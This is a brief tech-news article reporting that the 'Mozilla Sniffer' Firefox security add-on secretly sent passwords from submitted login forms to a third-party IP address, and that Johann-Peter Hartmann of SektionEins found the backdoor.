/>
X
Innovation

Firefox security test add-on contains backdoor

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third-party.

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third-party.

However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability in any application being tested — whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author.

The backdoor was uncovered by Mozilla user Johann-Peter Hartmann of SektionEins who was using the add-on to test the security of a friend's online game.

This was a pretty serious issue. The Mozilla Sniffer add-on overwrote some of the original Tamper Data files, and added a new script that injected injects a new function which was called whenever a form is submitted by the browser. The function looked for any forms that have non-empty password fields and then uses two other functions to send the data to the third-party, presumably a fraudster.

Oooops.

Editorial standards

Related

Garmin's new Index BPM is the blood pressure monitor that I've been waiting for
garmin-index-bpm-lifestyle

Garmin's new Index BPM is the blood pressure monitor that I've been waiting for

You can use an AI Time Machine to see what you'd look like in different eras throughout history
Photo renderings of a woman throughout different decades using AI Time Machine

You can use an AI Time Machine to see what you'd look like in different eras throughout history

We will see a completely new type of computer, says AI pioneer Geoff Hinton
artificial-intelligence

We will see a completely new type of computer, says AI pioneer Geoff Hinton